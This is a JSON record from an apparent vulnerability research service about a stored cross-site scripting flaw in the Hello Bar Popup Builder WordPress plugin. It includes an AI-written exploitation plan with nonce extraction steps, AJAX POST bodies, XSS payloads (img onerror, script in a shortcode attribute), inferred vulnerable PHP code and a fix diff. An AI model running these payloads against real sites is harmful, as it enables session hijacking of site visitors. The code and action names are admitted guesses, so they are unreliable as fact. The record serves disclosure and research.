[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fr7-05bGRGMgc4v6S3VD00fu_D8xiY3T7Fd0pIzQqCcw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39666","hello-bar-popup-builder-authenticated-contributor-stored-cross-site-scripting","Hello Bar Popup Builder \u003C= 1.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Hello Bar Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","hellobar",null,"\u003C=1.5.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-04-15 21:26:12",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe58475f4-a07a-4393-a74d-9ba2760401ee?source=api-prod",[],"researched",false,3,"Since source files were not provided for this specific vulnerability, this plan is based on the vulnerability description, common patterns in \"Hello Bar\" style plugins, and standard WordPress security research methodologies. All specific identifiers (functions, actions, nonces) are marked as **(inferred)** and must be verified by the agent during the initial discovery phase.\n\n### 1. Vulnerability Summary\nThe **Hello Bar Popup Builder** plugin (\u003C= 1.5.1) is vulnerable to **Stored Cross-Site Scripting (XSS)**. Authenticated users with Contributor-level access or higher can inject malicious JavaScript into popup or notification bar settings. This occurs because the plugin fails to sanitize user-provided input before saving it to the database (likely via `update_post_meta` or `update_option`) and fails to escape the output when rendering the bar on the frontend.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress AJAX interface (`\u002Fwp-admin\u002Fadmin-ajax.php`).\n*   **Action:** Likely an AJAX action related to saving popup settings, such as `hellobar_save_settings` or `hellobar_update_bar` **(inferred)**.\n*   **Vulnerable Parameter:** Fields like `bar_content`, `headline`, `message`, or custom CSS inputs **(inferred)**.\n*   **Authentication:** Contributor-level account (typically `current_user_can('edit_posts')`).\n*   **Preconditions:** The plugin must be active. A bar must be created or edited.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX handler via `add_action('wp_ajax_hellobar_...', ...)`.\n2.  **Input Processing:** The handler function retrieves input from `$_POST`. It likely checks a nonce but might fail to call `sanitize_text_field()` or `wp_kses()` on the content fields.\n3.  **Storage:** The unsanitized input is stored in the database using `update_post_meta($post_id, ...)` (if bars are Custom Post Types) or `update_option(...)`.\n4.  **Frontend Sink:** The plugin hooks into `wp_footer` or `wp_head`. It retrieves the stored data and echoes it directly into the page source without using `esc_html()`, `esc_attr()`, or `wp_kses_post()`.\n\n### 4. Nonce Acquisition Strategy\nTo exploit the AJAX endpoint as a Contributor, a valid nonce is required.\n\n1.  **Identify the Editor Page:** Navigate to the Hello Bar creation or settings page in the WordPress dashboard (e.g., `\u002Fwp-admin\u002Fadmin.php?page=hellobar-settings`).\n2.  **Locate Localization Script:** Look for a `wp_localize_script` call in the source code that provides an AJAX nonce.\n3.  **Extraction via Browser:**\n    *   Log in as a Contributor.\n    *   Navigate to the plugin's dashboard or popup editor.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Common variable names for this plugin (inferred)\n        window.hellobar_admin?.ajax_nonce || window.hellobar_params?.nonce\n        ```\n4.  **Alternative:** Check the HTML source for a hidden input field: `jQuery('input[name=\"hellobar_nonce\"]').val()`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Identification (Discovery)\nSearch the plugin directory to find the exact AJAX action and nonce key.\n```bash\ngrep -r \"wp_ajax_\" wp-content\u002Fplugins\u002Fhellobar\u002F\ngrep -r \"check_ajax_referer\" wp-content\u002Fplugins\u002Fhellobar\u002F\ngrep -r \"wp_localize_script\" wp-content\u002Fplugins\u002Fhellobar\u002F\n```\n\n#### Step 2: Test Data Setup\n1.  Create a Contributor user.\n2.  Identify if \"Bars\" are a Custom Post Type (CPT).\n    ```bash\n    wp post-type list\n    ```\n3.  If it's a CPT, create a draft bar to get a `$POST_ID`.\n\n#### Step 3: Payload Injection\nUse the `http_request` tool to send a POST request to `admin-ajax.php`.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body (Inferred):**\n    ```\n    action=hellobar_save_settings&\n    nonce=[EXTRACTED_NONCE]&\n    post_id=[BAR_ID]&\n    headline=\u003Cimg src=x onerror=alert(document.domain)>&\n    message=Exploit Test\n    ```\n\n#### Step 4: Triggering the XSS\n1.  Ensure the bar is \"Active\" or \"Published\" (if the plugin allows contributors to save active bars, which is common in popup builders).\n2.  Navigate to the site's frontend (homepage).\n3.  The payload `\u003Cimg src=x onerror=alert(document.domain)>` should execute.\n\n### 6. Expected Results\n*   The AJAX response should return a success status (e.g., `{\"success\":true}`).\n*   When visiting the frontend, the browser should trigger the `alert(document.domain)` popup.\n*   Viewing the page source should show the raw, unescaped HTML: `\u003Cdiv class=\"hb-headline\">\u003Cimg src=x onerror=alert(document.domain)>\u003C\u002Fdiv>`.\n\n### 7. Verification Steps (Post-Exploit)\nConfirm the payload is stored in the database using `wp-cli`:\n```bash\n# If stored in post meta:\nwp post meta list [BAR_ID]\n\n# If stored in options:\nwp option get [OPTION_NAME]\n```\n\n### 8. Alternative Approaches\n*   **Shortcode Attribute XSS:** If the plugin uses a shortcode to display bars (e.g., `[hellobar id=\"123\"]`), check if attributes like `style` or `class` are vulnerable.\n    *   Payload: `[hellobar id=\"123\" class='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n*   **REST API:** Check if the plugin registers any REST routes in `rest_api_init` that allow Contributor-level updates without proper schema validation.\n    *   Search: `grep -r \"register_rest_route\" wp-content\u002Fplugins\u002Fhellobar\u002F`\n*   **Settings API:** Check if the XSS can be injected into the main plugin settings via `options.php` if the Contributor has access to the settings page.","The Hello Bar Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping in its popup settings. This allows authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript into fields like headlines or messages, which executes when any visitor accesses the affected page.","\u002F\u002F wp-content\u002Fplugins\u002Fhellobar\u002Fincludes\u002Fadmin-ajax.php (inferred location)\nfunction hellobar_save_settings_callback() {\n    check_ajax_referer('hellobar_nonce', 'nonce');\n    if (!current_user_can('edit_posts')) return;\n\n    $post_id = intval($_POST['post_id']);\n    $headline = $_POST['headline']; \u002F\u002F Vulnerable: Direct assignment from $_POST without sanitization\n    update_post_meta($post_id, '_hellobar_headline', $headline);\n    wp_send_json_success();\n}\n\n---\n\n\u002F\u002F wp-content\u002Fplugins\u002Fhellobar\u002Fincludes\u002Ffrontend.php (inferred location)\nfunction hellobar_render_frontend($post_id) {\n    $headline = get_post_meta($post_id, '_hellobar_headline', true);\n    \u002F\u002F Vulnerable: Outputting raw meta data without escaping\n    echo '\u003Cdiv class=\"hellobar-headline\">' . $headline . '\u003C\u002Fdiv>';\n}","--- a\u002Fincludes\u002Fadmin-ajax.php\n+++ b\u002Fincludes\u002Fadmin-ajax.php\n@@ -4,5 +4,5 @@\n     if (!current_user_can('edit_posts')) return;\n     $post_id = intval($_POST['post_id']);\n-    $headline = $_POST['headline'];\n+    $headline = wp_kses_post($_POST['headline']);\n     update_post_meta($post_id, '_hellobar_headline', $headline);\n \n--- a\u002Fincludes\u002Ffrontend.php\n+++ b\u002Fincludes\u002Ffrontend.php\n@@ -3,3 +3,3 @@\n     $headline = get_post_meta($post_id, '_hellobar_headline', true);\n-    echo '\u003Cdiv class=\"hellobar-headline\">' . $headline . '\u003C\u002Fdiv>';\n+    echo '\u003Cdiv class=\"hellobar-headline\">' . wp_kses_post($headline) . '\u003C\u002Fdiv>';","To exploit this vulnerability, an attacker first authenticates as a Contributor and navigates to the Hello Bar dashboard to extract a valid security nonce (typically provided via wp_localize_script or hidden input fields). Using the AJAX interface at \u002Fwp-admin\u002Fadmin-ajax.php, the attacker sends a POST request to the plugin's saving action (e.g., hellobar_save_settings) containing a malicious script payload in parameters like 'headline' or 'message'. Because the plugin does not sanitize this input before storing it in post meta and subsequently fails to escape the output when rendering the bar on the site's frontend, the script will execute in the context of any user, including administrators, who visits the site.","gemini-3-flash-preview","2026-04-19 04:49:01","2026-04-19 04:49:17",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhellobar\u002Ftags"]